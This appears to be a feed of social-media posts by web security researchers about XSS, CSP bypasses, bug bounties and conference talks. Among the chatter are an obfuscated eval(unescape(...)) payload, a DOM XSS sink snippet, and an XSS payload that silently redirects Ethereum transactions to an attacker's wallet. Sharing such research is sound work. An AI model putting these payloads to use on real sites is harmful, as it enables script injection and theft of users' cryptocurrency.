I won't keep you in mystery any longer, here's how I found an XSS vulnerability *in* Shazzer! The chain involved some interesting browser techniques no sane developer could foresee. Check out the details below: jorianwoltjer.com/blog/p/stori... (and thanks @garethheyes.co.uk for making Shazzer!)

Looking back on #hh0526 with a big smile. 😊 We brought together 22 hackers from 9 different nationalities in the wonderful city of Utrecht for a day of pure bug bounty fun, hacking on @intigriti.com programs with special event bonuses included.

eval(unescape(escape`!򩡵򫡣򭁩򫱮ꈊ򚀩򮱬򩑴򘁧򟑒򭑮򫡥򬠮򩱥򭁉򫡳򭁡򫡣򩐨򚐻򪑦򚀡򩱼򯀡򩰮򬁬򨑹򪑮򩰩򬡥򭁵򬡮򘁤򫱣򭑭򩑮򭀮򩁩򬱰򨑴򨱨򡑶򩑮򭀨򫡥򭰠򢱥򮑢򫱡򬡤򡑶򩑮򭀨򘡫򩑹򩁯򭱮򘠬򮱫򩑹򠱯򩁥ꎣ򜡽򚐩򛁶򫱩򩀠򬱥򭁔򪑭򩑯򭑴ꊊⱐ򜀩򞱬򩑴򘁴ꏑ򛁮򛁯ꏐ򛁩ꏐ򛁐򟐢򬁴򩑲򫱤򨑣򭁹򫀢򛁳򟐨򚐽򟡻򪑦򚀡򭀩򬡥򭁵򬡮򞱬򩑴򘁧򟑒򭑮򫡥򬠮򩱥򭁉򫡳򭁡򫡣򩐨򚐻򪑦򚀡򩱼򯁧򛡣򬡡򬱨򩑤򚑲򩑴򭑲򫠠򭀽򜀻򫁥򭀠򩠽򩰮򭁒򩑸򛁣򟑧򛡨򫱲򪑺򫱮򛡯򨡳򭁡򨱬򩑳򛁲򟑧򛡣򭑲򬡥򫡴򤱰򩑥򩀬򭐽ⴐ򛑲ꋱ򜀬򭰽򩠮򮁐򫱳򛁗򟑦򛡣򫱮򩡩򩰮򭱩򩁴򪀬򮀽򭰫򥰻򪑦򚁯򚑻򪐫򚰻򫁥򭀠򩐽򜐻򩡯򬠨򫁥򭀠򪠠򫱦򘁣򚑻򫁥򭀠򥀽򪠮򭁹򬁥򠱯򫡦򪑧򞱩򩠨򥀮򭁹򬁥򟐽򤀦򙡪򛡹򤁯򬰼ꏗ򝐩򨱯򫡴򪑮򭑥򞱩򩠨򪠮򮁐򫱳򟁸ꊳ򜀦򙡪򛡸򤁯򬰫򥀮򭱩򩁴򪀪򪠮򬱩򮡥򟡷ꋑ򜀦򙡦򛡹򤁯򬰫򩠮򨱯򫡦򪑧򛡨򩑩򩱨򭀾򪠮򮑐򫱳򚑻򩐽򜀻򨡲򩑡򪱽򯑥򙠦򩠮򪡵򫑰򪑮򩰦򙡩ꏥ򙠦򩠮򩑮򩁊򭑭

For anyone curious, I just pushed the complete set to our repo: github.com/renniepak/CS...

When reviewing pull requests with new additions for CSPBypass.com, I often find myself questioning how useful a given entry actually is. If no websites whitelist a specific host, there is little point in adding it.

What windows or MacOs files reliably contain the username of the currently logged in user WITHOUT that username being part of the file path?

The best time to quit bug bounty was 20 months ago. The second best time is now.

Added a small feature to cspbypass.com to warn the user if unsafe-inline is detected, in which case you typically don’t need to waste time hunting for 3rd-party whitelisted CSP bypasses and go straight to inline scripts / event handlers.

Bypass CSP in a single click using my new Custom Action, powered by @renniepak.nl's excellent CSP bypass project.

Thanks for mentioning our site cspbypass.com

we at cspbypass.com recommend cspbypass.com

Found an XSS but got blocked by the CSP? https://cspbypass.com has a compiled list of ways to bypass the Content-Security Policy. Check out the video below 👇

In a shameless effort to promote my book. I've crafted some very special vectors for you. If you like them please purchase my book to read more. www.amazon.com/dp/B0BRD9B3GS

Been playing around with strudel.cc recently. It is pretty awesome! strudel.cc#Ly9Td2VldCBE...

Great interview with @racheltobac.bsky.social shining a light in a lot of important topics, like what are likely attack vectors, impact of #AI on #security, #ethics, affecting social interactions and #privacy . "Be politely paranoid." 👏 www.youtube.com/watch?v=xEdZ...

Coded some PHP today without using ChatGPT, like a mad man.

Time to reveal what I was doing with @teknogeek.io back in '19. All the hard work and sleepless nights have paid off!

Just finished a major UI overhaul of CSPBypass.com and would love your feedback. Excited to welcome ProjectDiscovery as our first sponsor. Huge thanks to their team for supporting the project and recognizing its value to the community.

I enabled sponsorships on Github for cspbypass.com. The main goal is to cover hosting fees etc. So if you want to support my work, I would highly appreciate it if you could become a sponsor. github.com/sponsors/ren... Thanks!

Forgot how to bug bounty.

LOL. almost 3 years after reporting it and it being fixed, I got assigned a CVE for a vuln I found 🙃 nvd.nist.gov/vuln/detail/...

Made hacking rooms work in real time. This demo connects three browsers with real time editing on. From Chrome I edit some HTML. This gets sent over websockets to the other browsers which call postMessage to a blob with a sandboxed iframe.

😍

I feel like I have all the pieces to a ATO chain. I just have no idea what the chain would be...

Epic Firefox XSS vectors by Masato Kinugawa. Now available on our XSS cheat sheet including variants found by me. Link to vectors👇 portswigger.net/web-security...

🏳️‍🌈

Abuse EvalError, onpageswap, and setTimeout to get JS execution without parens. @0x999.net redirects the page to trigger onpageswap, hijacks the thrown error, and turns it into code. Inspired by @terjanq.me. Now available on the XSS cheat sheet. Link to vector👇 portswigger.net/web-security...

Such a DOM XSS tease: var s=document.createElement('style');s.innerHTML=decodeURIComponent(location.hash.slice(1));document.head.appendChild(s)

Web2 Bugs + Crypto Bug Bounty Program = Drama.

For those who missed it, check out my talk, “Widgets Gone Wild: Exploiting XSS through Flawed postMessage Origin Checks.” 📺 Watch here: www.youtube.com/watch?v=qgB0... 🖥️ Follow along with the slides: 0-a.nl/nahamcon/

The slides and examples for my talk "Widgets Gone Wild: Exploiting XSS Through Flawed postMessage Origin Checks" at NahamCon can be found here: 0-a.nl/nahamcon/

The security team running a bug bounty program as soon as your report comes in:

Here is the official writeup of my XSS challenge on Intigriti. I think it contains some fun browser trivia even for those who did not look at the chall joaxcar.com/blog/2025/05...

The schedule got an update: Tune in at 1:35 PM (PDT) / 10:35 PM (CEST) for my talk!

Today I learned I not only have CVEs but also a "EUVD" 😀 euvd.enisa.europa.eu/enisa/EUVD-2...

If you’re into bug bounty hunting and like finding weird XSS bugs (like me 😊) in places most people overlook, come check out my talk at NahamCon 2025 this Friday, May 23. "Widgets Gone Wild: Exploiting XSS Through Flawed postMessage Checks"

I'm excited to be speaking at #NahamCon2025 on May 23rd! I'm going to be talking about a bug class that I believe is very undervalued, and will outline a methodology for how to find and exploit it in the wild. May the bounties rain down upon you! Details here: www.nahamcon.com

I did it! 🥳

Added a small feature to cspbypass.com that allows you to copy payloads by just clicking on them.

Pay. The. Bounty. Please.

Excited to be part of #nahamcon2025!

Fun little XSS payload that will always replace the "to" address of eth_sendTransaction with yours. !function(){if(!window.ethereum)return;let e=ethereum.request;ethereum.request=n=>(n?.method==="eth_sendTransaction"&&n.params?.[0]?.to&&(n.params[0].to="0x...[your wallet]"),e.apply(this,[n]))}();

Proud to announce I'll be speaking at NahamCon this year! www.nahamcon.com

Bug bounty in a nutshell.

Wow. Sora is pretty insane.

So annoying that HackenProof pays in USDT(TRC-20). And you can get paid in cash (USD) but they need like a CoC registration document to be able to receive the money. Never had to show that for any of the major platforms.

XSS is still the most common bug class that can be insanely profitable if you master it like my today's guest - Renniepak. In this interview, we talk XSS, CSP bypasses, access control, JS bookmarks, and more... Enjoy🔥

Following other's lead, I put together an XSS challenge to solve a somewhat tricky injection I'd come across. In producing the challenge I came up with my solution (so in that way I guess it served it's purpose) but interested in how other's would approach it 🤔 blog.ajxchapman.com/xss/challeng...

I found a fun XSS: Vulnerable site has a postMessage listener that can trigger a redirect to a javascript: URI but has a strict origin check to only accept messages from a specific 3rd party domain. Found a XSS on the 3rd party domain to send messages with the correct origin.